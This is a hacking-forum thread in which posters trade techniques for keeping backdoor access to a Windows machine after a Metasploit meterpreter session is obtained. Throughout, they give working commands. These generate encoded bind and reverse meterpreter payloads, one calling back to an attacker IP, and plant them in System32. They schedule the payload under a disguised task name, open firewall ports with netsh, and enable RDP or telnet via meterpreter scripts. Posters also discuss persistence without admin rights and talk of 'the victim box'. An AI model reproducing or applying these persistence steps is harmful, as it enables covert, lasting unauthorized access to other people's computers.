Opening backdoor after getting meterpreter session

[hawaii67]

meterpreter >
Background session 3? [y/N]
msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
[-] Invalid gateway specified.
msf exploit(handler) >

Well, it should be

Code:

route add 192.168.1.0 255.255.255.0 3

Since the sessions is #3.


To the other problem: lynx will break the shell here.

[kazalku]

I use "links", as opposed to "lynx", but whatever floats your boat Also, as per my tutorial, just execute "links" and make sure you're interacting with the process, then you can tell it to browse to yahoo.com from there.

~phoenix910

Did you use this one:
http://links.sourceforge.net/
I uploaded the exe file & dll's..... again locally it's working (although 192.168.1.1 doesn't work), but not remotely. I tried "execute -f links.exe -H -c -i" from meterpreter session and also tried to run cmd first & then "links" from the shell...... any idea??

Well, it should be

Code:

route add 192.168.1.0 255.255.255.0 3

Since the sessions is #3.


To the other problem: lynx will break the shell here.

Thanks a lot.... will try it

[BadKarmaPR]

why not use Metasploit it self? create a payload with msfpayload something like this:

Code:

/msfpayload windows/meterpreter/bind_tcp LPORT=8080 R | ./msfencode -c 2 -t exe -o 345532.exe

then upload the exe into %WINDIR%\System32\ , shecdule it to run every time the server is reboted like this:

Code:

schtasks /create /tn "SysCheckonStart" /tr c:\windows\system32\345532.exe /sc onstart

then configure the built in firewall to let the conection to this port thru:

Code:

netsh firewall set portopening protocol = tcp port = 8080 mode = enable'

or better yet create an account and enable RDP or Telnet you can use my meterpreter script that is part of Metasploit 3.2 just run in meterpreter

Code:

run getgui -h
run gettelnet -h

for the options it will do all the heavy lifting for you, if you only have shell follow this post on my blog:

http://darkoperator.blogspot.com/200...-shell-in.html

there are many ways to skin the cat I hope this sets you in the right direction and sorry for the self promotion by mentioning my scripts and blog

[Tr00g33k]

BadKarmaPR I liked your post very much especialy that one with the firewall port forwarding. Is there any way(maybe option in metasploit),maybe some program or something to forward ports through ROUTER without accessing router page?

Thnx in advance,
Tr00G33k

[purehate]

sorry for the self promotion by mentioning my scripts and blog

Nonsense, You contributions to metasploit and backtrack are very valuable.

[cr1spyj0nes]

ok i have a shell in to my vista box, but i dont have admin priv, so how do i set up a backdoor with out admin priv?

[BadKarmaPR]

BadKarmaPR I liked your post very much especialy that one with the firewall port forwarding. Is there any way(maybe option in metasploit),maybe some program or something to forward ports through ROUTER without accessing router page?

Thnx in advance,
Tr00G33k

Thanks, sadly the portfwrd command in meterpreter in version 3.2 is broken you might try to get a copy of 3.0 and test on it and also on 3.1 with reverse shell since it fails on the bind shell since its conception.

[BadKarmaPR]

ok i have a shell in to my vista box, but i dont have admin priv, so how do i set up a backdoor with out admin priv?

if UAC is enabled this is going to be a hard one to make, you can place it in the programs startup folder. schtasks should let you schedule as the user the same as AT.

[Tr00g33k]

Portfwrd in metasploit, actualy forward port through router, firewall,etc.(it`s meant to do this)?If I understand correctly?

Tr00G33k

[kazalku]

Thanks a lot for the reply. However, for few reasons (one could be my improper knowledge), I couldn't use any of these:

Failure of 1st solution

why not use Metasploit it self?

Because I prepared the exe file

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=82.24.180.xxx LPORT=7777 R | ./msfencode -b '' -t exe -o toBT3box.exe

then placed the exe into vista box with public IP of 82.24.180.yyy (yes, it's different). The exe connects back to the attacker ONLY if the exploit is running at the time of execution of the exe file. That means the exe file only tries ONCE to connect to the BT3 box, if it fails to connect (which happens when BT3 is not listening), vista shows an error message "toBT3box.exe has stopped working .... bla bla bla".

So, there is no point of making the exe file scheduled to run every time server reboots. I saved the exe file in windows folder & edited remote registry to run it every time the computer restarts. This is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts) & if I miss it then will have to wait until other one restarts.

Failure of 2nd solution

or better yet create an account and enable RDP or Telnet you can use my meterpreter script that is part of Metasploit 3.2 just run in meterpreter

Code:

run getgui -h
run gettelnet -h

I tried to this one earlier, didn't work. Please look to my 1st post of this thread for details. I used nc to listen at port 8888. Then tried to connect to the box from BT3 (82.24.180.xxx) like this:

Code:

nc 82.24.180.yyy 8888

The command is not working, because we didn't ask the router to forward 8888 request to vista box. And in the real world I (or the attacker) wouldn't be able to configure the router of the victim box.

Am I missing something???